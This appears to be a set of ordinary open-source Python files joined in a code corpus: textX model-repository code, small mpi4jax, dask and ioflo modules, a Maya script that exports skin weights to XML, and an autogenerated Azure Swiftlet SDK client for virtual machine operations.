if len(filenames) == 0:
raise IOError(
errno.ENOENT, os.strerror(errno.ENOENT), filename_pattern)
loaded_models = []
for filename in filenames:
the_metamodel = metamodel_for_file_or_default_metamodel(
filename, the_metamodel)
loaded_models.append(
self.load_model(the_metamodel, filename, is_main_model,
encoding=encoding,
add_to_local_models=add_to_local_models,
model_params=model_params))
return loaded_models
def load_model_using_search_path(
self, filename, model, search_path, is_main_model=False,
encoding='utf8', add_to_local_models=True, model_params=None):
"""
Add a new model to all relevant objects
Args:
filename: models to be loaded
model: model holding the loaded models in its _tx_model_repository
field (may be None).
search_path: list of search directories.
Returns:
the loaded model
"""
from textx import get_metamodel
if model:
self.update_model_in_repo_based_on_filename(model)
for the_path in search_path:
full_filename = join(the_path, filename)
# print(full_filename)
if exists(full_filename):
if model is not None:
the_metamodel = get_metamodel(model)
else:
the_metamodel = None
the_metamodel = metamodel_for_file_or_default_metamodel(
filename, the_metamodel)
return self.load_model(the_metamodel,
full_filename,
is_main_model,
encoding=encoding,
add_to_local_models=add_to_local_models,
model_params=model_params)
raise IOError(
errno.ENOENT, os.strerror(errno.ENOENT), filename)
def load_model(
self, the_metamodel, filename, is_main_model, encoding='utf-8',
add_to_local_models=True, model_params=None):
"""
Load a single model
Args:
the_metamodel: the metamodel used to load the model
filename: the model to be loaded (if not cached)
Returns:
the loaded/cached model
"""
assert model_params is not None,\
"model_params needs to be specified"
filename = abspath(filename)
if not self.local_models.has_model(filename):
if self.all_models.has_model(filename):
# print("CACHED {}".format(filename))
new_model = self.all_models[filename]
else:
# print("LOADING {}".format(filename))
# all models loaded here get their references resolved from the
# root model
new_model = the_metamodel.internal_model_from_file(
filename, pre_ref_resolution_callback=lambda
other_model: self.pre_ref_resolution_callback(other_model),
is_main_model=is_main_model, encoding=encoding,
model_params=model_params)
self.all_models[filename] = new_model
# print("ADDING {}".format(filename))
if add_to_local_models:
self.local_models[filename] = new_model
else:
# print("LOCALLY CACHED {}".format(filename))
pass
assert filename in self.all_models # to be sure...
return self.all_models[filename]
def _add_model(self, model):
filename = self.update_model_in_repo_based_on_filename(model)
# print("ADDED {}".format(filename))
self.local_models[filename] = model
def update_model_in_repo_based_on_filename(self, model):
"""
Adds a model to the repo (not initially visible)
Args:
model: the model to be added. If the model
has no filename, a name is invented
Returns:
the filename of the model added to the repo
"""
if model._tx_filename is None:
for fn in self.all_models.filename_to_model:
if self.all_models.filename_to_model[fn] == model:
# print("UPDATED/CACHED {}".format(fn))
return fn
i = 0
while self.all_models.has_model("anonymous{}".format(i)):
i += 1
myfilename = "anonymous{}".format(i)
self.all_models[myfilename] = model
else:
myfilename = abspath(model._tx_filename)
if (not self.all_models.has_model(myfilename)):
self.all_models[myfilename] = model
# print("UPDATED/ADDED/CACHED {}".format(myfilename))
return myfilename
def pre_ref_resolution_callback(self, other_model):
"""
internal: used to store a model after parsing into the repository
Args:
other_model: the parsed model
Returns:
nothing
"""
filename = other_model._tx_filename
# print("PRE-CALLBACK -> {}".format(filename))
assert (filename)
filename = abspath(filename)
other_model._tx_model_repository = \
GlobalModelRepository(self.all_models)
self.all_models[filename] = other_model
class ModelLoader(object):
"""
This class is an interface to mark a scope provider as an additional model
loader.
"""
def __init__(self):
pass
def load_models(self, model):
pass
def get_all_models_including_attached_models(model):
"""
get a list of all models stored within a model
(including the owning model).
@deprecated (BIC): use model_object.get_included_models()
Args:
model: the owning model
Returns:
a list of all models
"""
return get_included_models(model)
def get_included_models(model):
"""
get a list of all models stored within a model
(including the owning model).
Args:
model: the owning model
Returns:
a list of all models
"""
if (hasattr(model, "_tx_model_repository")):
models = list(model._tx_model_repository.all_models)
if model not in models:
models.append(model)
else:
models = [model]
return models
def is_file_included(filename, model):
"""
Determines if a file is included by a model. Also checks
for indirect inclusions (files included by included files).
Args:
filename: the file to be checked (filename is normalized)
model: the owning model
Returns:
True if the file is included, else False
(Note: if no _tx_model_repository is present,
the function always returns False)
"""
if (hasattr(model, "_tx_model_repository")):
all_entries = model._tx_model_repository.all_models
return all_entries.has_model(filename)
else:
return False
def remove_models_from_repositories(models,
models_to_be_removed):
"""
Remove models from all relevant repositories (_tx_model_repository
of models and related metamodel(s), if applicable).
Args:
models: the list of models from
which the models_to_be_removed have to be removed.
models_to_be_removed: models to be removed
Returns:
None
"""
assert isinstance(models, list)
for model in models:
if hasattr(model._tx_metamodel, "_tx_model_repository"):
model._tx_metamodel. \
_tx_model_repository.remove_models(models_to_be_removed)
if hasattr(model, "_tx_model_repository"):
model._tx_model_repository.remove_models(models_to_be_removed)
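if __name__ == "__main__":
    # Minimal, self-contained sketch of the ModelRepository bookkeeping
    # (illustrative only; real models are produced by textX metamodels).
    from types import SimpleNamespace
    repo = ModelRepository()
    dummy_model = SimpleNamespace(_tx_filename=join(os.getcwd(), "example.tx"))
    repo.add_model(dummy_model)
    assert dummy_model._tx_filename in repo
    assert len(repo) == 1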
|
mpi4jax/_src/flush.py | Thenerdstation/mpi4jax | 122 | 12776281 | <reponame>Thenerdstation/mpi4jax
import jax
def flush(platform):
"""Wait for all pending XLA operations"""
devices = jax.devices(platform)
for device in devices:
# as suggested in jax#4335
noop = jax.device_put(0, device=device) + 0
noop.block_until_ready()
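if __name__ == "__main__":
    # Illustrative use: block until all queued XLA work on CPU devices has finished.
    flush("cpu")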
|
dask/dataframe/io/orc/__init__.py | Juanlu001/dask | 9,684 | 12776284 | <filename>dask/dataframe/io/orc/__init__.py
from .core import read_orc, to_orc
|
ioflo/base/__init__.py | BradyHammond/ioflo | 128 | 12776308 | <filename>ioflo/base/__init__.py
""" base package
"""
#print("Package at {0}".format(__path__[0]))
import importlib
_modules = ['globaling', 'excepting', 'interfacing',
'registering', 'storing', 'skedding',
'tasking', 'framing', 'logging', 'serving', 'monitoring',
'acting', 'poking', 'goaling', 'needing', 'traiting',
'fiating', 'wanting','completing','doing', 'deeding', 'arbiting',
'housing', 'building']
for m in _modules:
importlib.import_module(".{0}".format(m), package='ioflo.base')
from .storing import Store, Node, Share, Data, Deck
from .doing import doify, Doer, DoerParam, DoerSince, DoerLapse
|
tools/writeBurlyWeights.py | fsanges/glTools | 165 | 12776339 | import maya.mel as mm
import maya.cmds as mc
import maya.OpenMaya as OpenMaya
import glTools.utils.base
import glTools.utils.mesh
import glTools.utils.skinCluster
import os.path
def writeBurlyWeights(mesh,skinCluster,influence,filePath):
'''
'''
# Get basic procedure information
burly = 'dnBurlyDeformer1'
vtxCount = mc.polyEvaluate(mesh,v=True)
inf = mc.ls(influence,l=True)
# Check skinCluster
if not glTools.utils.skinCluster.isSkinCluster(skinCluster):
raise Exception('Object "'+skinCluster+'" is not a valid skinCluster!')
# Get skinCluster Fn
skinFn = glTools.utils.skinCluster.getSkinClusterFn(skinCluster)
# Get influence dag path
influencePath = glTools.utils.base.getMDagPath(influence)
# Get points affected by influence
infSelectionList = OpenMaya.MSelectionList()
infWeightList = OpenMaya.MFloatArray()
skinFn.getPointsAffectedByInfluence(influencePath,infSelectionList,infWeightList)
infObjectPath = OpenMaya.MDagPath()
infComponentList = OpenMaya.MObject()
infSelectionList.getDagPath(0,infObjectPath,infComponentList)
# Get affect point indices
infComponentIndex = OpenMaya.MIntArray()
infComponentIndexFn = OpenMaya.MFnSingleIndexedComponent(infComponentList)
infComponentIndexFn.getElements(infComponentIndex)
infComponentIndex = list(infComponentIndex)
# Get affect point position and normal arrays
infComponentPosArray = OpenMaya.MPointArray()
infComponentNormArray = OpenMaya.MVectorArray()
infComponentVtxIt = OpenMaya.MItMeshVertex(infObjectPath,infComponentList)
normal = OpenMaya.MVector()
while not infComponentVtxIt.isDone():
infComponentPosArray.append(infComponentVtxIt.position(OpenMaya.MSpace.kWorld))
infComponentVtxIt.getNormal(normal)
infComponentNormArray.append(normal)
infComponentVtxIt.next()
# Open file
fileId = open(filePath, "w")
# Header
header = [ '<?xml version="1.0" standalone="no" ?>\n',
'<dnWeights type="dnBurlyDeformer" version="1.0" name="'+burly+'">\n',
'\t<Map name="'+inf[0]+'">\n',
'\t\t<Topology vertexCount="'+str(vtxCount)+'"/>\n' ]
fileId.writelines(header)
# Weights
weights = ['\t\t<Weights>\n']
for i in range(len(infComponentIndex)):
if not i%5: weights.append('\t\t\t')
weights.append(str(infWeightList[i]) + ' ')
if i%5 == 4: weights.append('\n')
weights.append('\n\t\t</Weights>\n')
fileId.writelines(weights)
# Indices
indices = ['\t\t<Indices>\n']
for i in range(len(infComponentIndex)):
if not i%10: indices.append('\t\t\t')
indices.append(str(infComponentIndex[i]) + ' ')
if i%10 == 9: indices.append('\n')
indices.append('\n\t\t</Indices>\n')
fileId.writelines(indices)
# Position
pos = ['\t\t<Positions>\n']
for i in range(len(infComponentIndex)):
if not i%2: pos.append('\t\t\t')
pos.append(str(infComponentPosArray[i][0])+' '+str(infComponentPosArray[i][1])+' '+str(infComponentPosArray[i][2])+' ')
if i%2: pos.append('\n')
pos.append('\n\t\t</Positions>\n')
fileId.writelines(pos)
# Normals
norm = ['\t\t<Normals>\n']
for i in range(len(infComponentIndex)):
if not i%2: norm.append('\t\t\t')
norm.append(str(infComponentNormArray[i][0])+' '+str(infComponentNormArray[i][1])+' '+str(infComponentNormArray[i][2])+' ')
if i%2: norm.append('\n')
norm.append('\n\t\t</Normals>\n')
fileId.writelines(norm)
# Radii
radii = ['\t\t<Radii>\n']
for i in range(len(infComponentIndex)):
if not i%6: radii.append('\t\t\t')
radii.append('0.01 ')
if i%6 == 5: radii.append('\n')
radii.append('\n\t\t</Radii>\n')
fileId.writelines(radii)
# Footer
footer = ['\t</Map>','\n</dnWeights>']
fileId.writelines(footer)
# Close file
fileId.close()
def writeBurlyWeights_allInfluences(mesh,skinCluster,directoryPath):
'''
'''
# Check mesh
if not glTools.utils.mesh.isMesh(mesh):
raise Exception('Object "'+mesh+'" contains no valid polygon mesh!')
# Check skinCluster
if not glTools.utils.skinCluster.isSkinCluster(skinCluster):
raise Exception('Object "'+skinCluster+'" is not a valid skinCluster!')
# Check directory
if not os.path.isdir(directoryPath):
raise Exception('Directory path "'+directoryPath+'" does not exist!')
# Get skinCluster influences
influenceList = mc.skinCluster(skinCluster,q=True,inf=True)
# Write weights
for influence in influenceList:
writeBurlyWeights(mesh,skinCluster,influence,directoryPath+influence+'.xml')
def loadBurlyWeights(burlyDeformer,directoryPath):
'''
'''
# Check burly deformer
if not mc.objExists(burlyDeformer):
raise Exception('Burly deformer "'+burlyDeformer+'" does not exist!')
# Check directory path
if not directoryPath.endswith('/'): directoryPath+='/'
if not os.path.isdir(directoryPath):
raise Exception('Directory path "'+directoryPath+'" does not exist!')
# Get directory listing
fileList = [i for i in os.listdir(directoryPath) if i.endswith('.xml')]
# Load weights
for filePath in fileList:
fileId = directoryPath+filePath
influence = filePath.replace('.xml','')
mm.eval('dnBurlyDeformer -loadWeights "'+fileId+'" "'+burlyDeformer+'" "'+influence+'"')
def convertToBurly(skinCluster,burlyDeformerName=''):
    '''
    Convert a skinCluster to a dnBurlyDeformer by exporting per-influence
    weight files and loading them onto a newly created burly deformer.
    '''
    # Check skinCluster
    if not mc.objExists(skinCluster):
        raise Exception('SkinCluster "'+skinCluster+'" does not exist!')
    if not glTools.utils.skinCluster.isSkinCluster(skinCluster):
        raise Exception('Object "'+skinCluster+'" is not a valid skinCluster deformer!')
    # Get affected mesh from the skinCluster (assumes a single affected mesh)
    mesh = mc.deformer(skinCluster,q=True,g=True)[0]
    # Designate temporary path for exported weight files
    dirPath = '/usr/tmp/'
    # Export skinCluster weight files
    influenceList = mc.skinCluster(skinCluster,q=True,inf=True)
    writeBurlyWeights_allInfluences(mesh,skinCluster,dirPath)
    # Create burly deformer
    mm.eval('dnBurlyDeformer_createNamed("'+mesh+'","'+burlyDeformerName+'")')
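# Illustrative usage from within a Maya session (object and deformer names are hypothetical):
#   writeBurlyWeights_allInfluences('bodyShape', 'skinCluster1', '/usr/tmp/')
#   loadBurlyWeights('dnBurlyDeformer1', '/usr/tmp/')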
|
src/swiftlet/azext_swiftlet/vendored_sdks/swiftlet/operations/_virtual_machine_operations.py | Mannan2812/azure-cli-extensions | 207 | 12776373 | <gh_stars>100-1000
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, List, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualMachineOperations(object):
"""VirtualMachineOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~swiftlet_management_client.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _start_initial(
self,
vm_name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
# Construct URL
url = self._start_initial.metadata['url'] # type: ignore
path_format_arguments = {
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_start_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}/start'} # type: ignore
def begin_start(
self,
vm_name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Start a specified virtual machine.
:param vm_name: The name of the virtual machine.
:type vm_name: str
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._start_initial(
vm_name=vm_name,
resource_group_name=resource_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}/start'} # type: ignore
def _stop_initial(
self,
vm_name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
# Construct URL
url = self._stop_initial.metadata['url'] # type: ignore
path_format_arguments = {
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_stop_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}/stop'} # type: ignore
def begin_stop(
self,
vm_name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Stop a specified virtual machine.
:param vm_name: The name of the virtual machine.
:type vm_name: str
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._stop_initial(
vm_name=vm_name,
resource_group_name=resource_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_stop.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}/stop'} # type: ignore
def list_image(
self,
location, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.SwiftletImageListResult"]
"""List all Swiftlet images available for the specified subscription and Azure location.
:param location: The name of a supported Azure region.
:type location: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SwiftletImageListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~swiftlet_management_client.models.SwiftletImageListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.SwiftletImageListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
if not next_link:
# Construct URL
url = self.list_image.metadata['url'] # type: ignore
path_format_arguments = {
'location': self._serialize.url("location", location, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('SwiftletImageListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_image.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Swiftlet/locations/{location}/swiftletImages'} # type: ignore
def list_bundle(
self,
location, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.SwiftletBundleListResult"]
"""List all Swiftlet bundles available for the specified subscription and Azure location.
:param location: The name of a supported Azure region.
:type location: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SwiftletBundleListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~swiftlet_management_client.models.SwiftletBundleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.SwiftletBundleListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
if not next_link:
# Construct URL
url = self.list_bundle.metadata['url'] # type: ignore
path_format_arguments = {
'location': self._serialize.url("location", location, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('SwiftletBundleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_bundle.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Swiftlet/locations/{location}/swiftletBundles'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
vm_name, # type: str
location, # type: str
swiftlet_bundle_sku, # type: str
swiftlet_image_id, # type: str
tags=None, # type: Optional[Dict[str, str]]
username=None, # type: Optional[str]
ssh_public_key=None, # type: Optional[str]
password=<PASSWORD>, # type: Optional[str]
ports=None, # type: Optional[List["models.Port"]]
startup_script=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.VirtualMachine"
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachine"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
_parameters = models.VirtualMachine(tags=tags, location=location, swiftlet_bundle_sku=swiftlet_bundle_sku, swiftlet_image_id=swiftlet_image_id, username=username, ssh_public_key=ssh_public_key, password=password, ports=ports, startup_script=startup_script)
api_version = "2020-03-01-preview"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'VirtualMachine')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
vm_name, # type: str
location, # type: str
swiftlet_bundle_sku, # type: str
swiftlet_image_id, # type: str
tags=None, # type: Optional[Dict[str, str]]
username=None, # type: Optional[str]
ssh_public_key=None, # type: Optional[str]
password=<PASSWORD>, # type: Optional[str]
ports=None, # type: Optional[List["models.Port"]]
startup_script=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.VirtualMachine"]
"""Create or update a virtual machine.
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
:type vm_name: str
:param location: The geo-location where the resource lives.
:type location: str
:param swiftlet_bundle_sku: Specifies the Swiftlet bundle of this virtual machine (which
specifies the selected tier of memory, processing, and storage).
:type swiftlet_bundle_sku: str
:param swiftlet_image_id: The image ID to use. The image "platform" must match the
"supportedImagePlatform" of the specified swiftletBundleSku.
:type swiftlet_image_id: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param username: The username for connecting the the virtual machine.
:type username: str
:param ssh_public_key: The SSH public key used to connect to this virtual machine. Only
supported on Linux images. If specified on a Windows image, an error will be returned.
:type ssh_public_key: str
:param password: The password for connecting to this Swiftlet. If the image platform type is
"linux", this is optional if sshPublicKey is set. If the image platform type is "windows", this
is required.
:type password: str
:param ports: The ports on which inbound traffic will be allowed.
:type ports: list[~swiftlet_management_client.models.Port]
:param startup_script: An inline script that will run upon startup of the virtual machine.
:type startup_script: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualMachine or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~swiftlet_management_client.models.VirtualMachine]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachine"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
vm_name=vm_name,
location=location,
swiftlet_bundle_sku=swiftlet_bundle_sku,
swiftlet_image_id=swiftlet_image_id,
tags=tags,
username=username,
ssh_public_key=ssh_public_key,
password=password,
ports=ports,
startup_script=startup_script,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
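    # Illustrative usage (hypothetical client and variable names; not part of the
    # generated SDK):
    #
    #   poller = client.virtual_machine.begin_create_or_update(
    #       resource_group_name="my-rg", vm_name="my-vm", location="westus2",
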